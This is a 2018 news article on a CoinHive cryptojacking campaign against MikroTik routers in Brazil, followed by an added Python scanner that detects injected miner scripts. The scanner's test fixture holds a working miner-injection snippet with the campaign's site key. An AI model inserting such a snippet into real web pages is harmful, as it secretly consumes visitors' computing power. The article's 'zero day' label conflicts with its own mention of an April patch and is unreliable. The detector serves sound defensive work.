Brazil has been hit by an elaborate cryptocurrency-mining attack that has infected hundreds of thousands of routers across the country.
The attack, which is still ongoing, specifically targets MikroTik routers. More than 200,000 devices have been hit so far, creating a massive XMR-mining botnet across Brazil.
The perpetrators infected the devices with malicious code that clandestinely runs CoinHive in the background. For those unfamiliar, CoinHive is a popular Monero mining script that has become widely used to pool visitors' processing power for cryptocurrency mining – often for charity, but unfortunately not this time.
This type of attack is known as a zero day – exploiting previously unknown vulnerabilities in the code. This zero day allowed CoinHive to run on every single page visited through the exposed devices – potentially millions of page loads every day carrying a hidden cryptocurrency-mining payload.
The attack began at the start of this week and is believed to be only just beginning. BleepingComputer reports that a second attack has started, bringing the total number of affected devices to over 200,000.
The Coinhive site key "oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4" is used in another campaign #cryptojacking addressed to MikroTik routers. In this case, over 25,000 affected hosts are found on @censysio
h/t @onyphe https://t.co/M9iLatsIVX
– Bad Packets Report (@bad_packets) August 2, 2018
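An added detection example, not from the article or from the researchers it quotes: a small Python scanner that checks fetched page bodies for an injected CoinHive loader and extracts the site key from the miner's constructor call, flagging the key named in the Bad Packets tweet above. The sample page markup and the loader URL are constructed input for the demonstration.

```python
import re
from html.parser import HTMLParser

# The only site key this article names (from the Bad Packets tweet).
KNOWN_CAMPAIGN_KEYS = {"oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4"}

# Matches the miner's constructor call, e.g. new CoinHive.Anonymous('KEY', {...})
SITE_KEY_RE = re.compile(
    r"CoinHive\.(?:Anonymous|User|Token)\(\s*['\"]([A-Za-z0-9_-]{16,64})['\"]"
)

class _ScriptCollector(HTMLParser):
    """Collect external <script src> values and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)
    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:  # HTMLParser hands script bodies to handle_data
            self.inline.append(data)

def scan_page(html):
    """Return CoinHive loader URLs, site keys found, and whether a key matches the campaign."""
    p = _ScriptCollector()
    p.feed(html)
    loaders = [s for s in p.srcs if "coinhive" in s.lower()]
    keys = set()
    for body in p.inline:
        keys.update(SITE_KEY_RE.findall(body))
    return {"coinhive_loaders": loaders,
            "site_keys": sorted(keys),
            "known_campaign": bool(keys & KNOWN_CAMPAIGN_KEYS)}

# Constructed samples: an ordinary page with a miner injected into it, and a clean page.
INJECTED = """<html><head><title>Weather</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4', {throttle: 0.3}); m.start();</script>
</head><body><p>Sunny.</p></body></html>"""
CLEAN = "<html><head><script src='/static/app.js'></script></head><body>ok</body></html>"

if __name__ == "__main__":
    print(scan_page(INJECTED))
    print(scan_page(CLEAN))
```

Run against page bodies captured behind a suspect router; a loader URL or known key on a page that does not normally carry one points at injection in transit rather than at the site itself.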
Although the manufacturer released a patch for this vulnerability in April, routers are often left out of date. Anyone with a MikroTik router is therefore urged to update it immediately.
Analysts fear the attack could spread like a global epidemic. SpiderLabs researcher Simon Kenin, who has since worked to spread word of the attack, was alerted to suspicious CoinHive traffic originating from Brazil.
"Let me underline how bad this attack is," he wrote in his analysis. "There are hundreds of thousands of these devices around the world, used by ISPs and different organizations and companies, each device serving at least tens if not hundreds of users per day."
This is symptomatic of a broader trend on the Internet. A few years ago, the world was prey to a plague of ransomware. Awareness has since grown so much that such extortion schemes have become harder to pull off.
Now, it seems, cryptojacking with scripts like CoinHive is all the rage. Kenin further emphasizes this tendency in his report:
Miners, on the other hand, can be much more stealthy, so while a single computer could produce more money from the ransomware if the user ends up paying, an attacker would prefer to run a stealthy miner for a longer period of time. The plan is that at some point the mining would be just as beneficial as, if not more than, the single ransom payout.
So, quickly: double check whether you have a MikroTik router. If you do, go directly to the manufacturer's website and get the official update.
Published 3 August 2018 – 13:58 UTC